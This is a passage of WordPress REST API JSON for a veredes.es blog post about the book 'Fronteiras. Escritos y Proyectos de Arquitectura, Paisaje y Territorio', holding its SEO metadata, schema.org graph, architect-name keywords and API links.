divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/0bbb669073ef7faba5168a0844e93d2c\",\"name\":\"veredes\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/face-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/face-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/face-96x96.jpg\",\"caption\":\"veredes\"},\"description\":\"Surge enero de 2009 como b\u00fasqueda de satisfacer el conocimiento de la actividad arquitect\u00f3nica y tangentes que se generan. La idea es crear un espacio para divulgar los diversos proyectos en busca de nueva inspiraci\u00f3n y de intercambio.\",\"sameAs\":[\"https:\\\/\\\/veredes.es\\\/\",\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/www.instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/www.pinterest.es\\\/veredes\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/veredes\",\"https:\\\/\\\/veredes.tumblr.com\\\/\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/alberto\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:] - veredes","description":"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/","og_locale":"es_ES","og_type":"article","og_title":"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:] - veredes","og_description":"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]","og_url":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_published_time":"2018-07-30T22:01:13+00:00","article_modified_time":"2024-08-21T15:32:00+00:00","og_image":[{"width":1200,"height":1700,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg","type":"image\/jpeg"}],"author":"veredes","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/veredes","twitter_site":"@veredes","twitter_misc":{"Escrito por":"veredes","Tiempo de lectura":"9 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/"},"author":{"name":"veredes","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/0bbb669073ef7faba5168a0844e93d2c"},"headline":"Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio","datePublished":"2018-07-30T22:01:13+00:00","dateModified":"2024-08-21T15:32:00+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/"},"wordCount":1755,"commentCount":0,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg","keywords":["AiPAC","Alejandro V\u00edrseda","Andaluc\u00eda","\u00c1ngel Mart\u00ednez Garc\u00eda-Posada","arquitectura espa\u00f1ola","arquitectura portuguesa","Bego\u00f1a Galeano D\u00edaz","Bernardo Rodrigues","Catarina Figueiras","C\u00e9sar Jim\u00e9nez de Tejada","Cristina Garc\u00eda Baeza","Daniel N. Jim\u00e9nez Ferrera","Diego Daza","Eduardo Baleiras","escritos","Espa\u00f1a","estudio entresitio","F. Javier L\u00f3pez Rivera","Fernando P\u00e9rez","Francisco Vieira de Campos","Gilberto Rodriguez","Gonzalo Mart\u00ednez","Ignacio Vila","I\u00f1aki P\u00e9rez de la Fuente","In\u00eas Belmar\u00e7o","In\u00eas Martins de Brito","In\u00eas Vieira da Silva","\u00cd\u00f1igo Garc\u00eda Odiaga","intervenci\u00f3n","Jorge Iv\u00e1n Guerrero Ram\u00edrez","Jos\u00e9 Algeciras Rodr\u00edguez","Juan Domingo Santos","Juanjo L\u00f3pez de la Cruz","Juli\u00e1n Prieto Fern\u00e1ndez","Juli\u00e1n Sobrino Simal","Manuel Aires Mateus","Mar\u00eda Gonz\u00e1lez Garc\u00eda","Mar\u00eda Hurtado de Mendoza","Marta \u00c1lvarez del Pastor","Marta Pelegr\u00edn","Miguel \u00c1ngel Serrano L\u00f3pez","Miguel Vieira","Pablo Bl\u00e1zquez Jes\u00fas","paisaje","paisaje cultural","patrimonio cultural","Paulo Henrique Dur\u00e3o","Portugal","publicaci\u00f3n","Rafel C\u00e1ceres Feria","Ra\u00fal G\u00e1lvez Tirado","recolectores urbanos","reutilizar","Rui Reis Alves","Santiago de Molina","territorio","Toni Giron\u00e8s"],"articleSection":["libros","publicaciones"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/","url":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/","name":"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:] - veredes","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg","datePublished":"2018-07-30T22:01:13+00:00","dateModified":"2024-08-21T15:32:00+00:00","description":"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg","width":1200,"height":1700},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/0bbb669073ef7faba5168a0844e93d2c","name":"veredes","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","caption":"veredes"},"description":"Surge enero de 2009 como b\u00fasqueda de satisfacer el conocimiento de la actividad arquitect\u00f3nica y tangentes que se generan. La idea es crear un espacio para divulgar los diversos proyectos en busca de nueva inspiraci\u00f3n y de intercambio.","sameAs":["https:\/\/veredes.es\/","https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/www.instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/www.pinterest.es\/veredes\/","https:\/\/x.com\/https:\/\/twitter.com\/veredes","https:\/\/veredes.tumblr.com\/"],"url":"https:\/\/veredes.es\/blog\/author\/alberto\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/69682","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=69682"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/69682\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/69683"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=69682"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=69682"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=69682"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}